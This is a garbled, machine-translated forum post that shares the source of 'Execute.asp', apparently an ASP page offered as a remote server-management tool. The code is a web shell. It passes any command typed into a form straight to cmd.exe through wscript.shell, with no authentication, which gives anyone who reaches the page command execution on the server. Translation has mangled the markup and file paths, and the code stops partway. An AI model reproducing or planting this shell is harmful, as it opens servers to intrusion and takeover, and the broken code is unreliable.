The server is like this

zhaozj2021-02-11  235

Recently I recently wrote a remote server-managed Stuff (borrowed from the partial code of ASE, adding the remote execution command, upload, service and other functions.) It is worth noting that the program run must have FileSystemObject support. The following is the original code for the remote execution command.

Copy saved as Execute.asp. execute command </ title> <style> <! - table, body {font-family: Song; font-size: 9pt} a {font-family: Song; Font-size: 9pt; Color: RGB (0, 32, 64); Text-Decoration: None } A: hover {font-family: Song; Color: RGB (255, 0); Text-Decoration: none} A: Visited {Color: RGB (128, 0, 0)} -> </ stop> </ head> <body bgcolor = "# 000000" Text = "# c0c0c0"> <form method = "post" action = "execute.asp"> <p align = "left"> Enter the command to perform: <input TYPE = "name =" ml "size =" 20 "value =" DIR C: / "style =" background-color: # c0c0c0; color: # 000000; border-style: solId; border-width: 1 " > <Input type = "Submit" Value = "Execute" Name = "B1" Style = "Background-Color: # c0c0c0; color: # 000000; Border: 1 Groove # c0c0c0> </ p> </ form> < % Ml = request.form ("ml") cmd = "c: /winnt/system32/cmd.exe / c" & ml & "> C: / w Hoami.txt "'Modify' WHOAMI.TXT path to a list of writes to a write-free directory set wshshell = server.createObject (" wscript.shell ") Retcode = WSHSHELL.Run (cmd, 1, true) if retcode = 0 THEN Response. Write ML & "Response.write" command successfully implemented! "&" <br> <br> "</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-4050.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="4050" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.041</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = '7olT_2Ff2Fi55wewGY7BH15LPiBcK2riaOAKT1fAqzsO6mdoouaRDJizVk4qdHE82iZuv1vPUeScrpiX45Y8Nopw_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>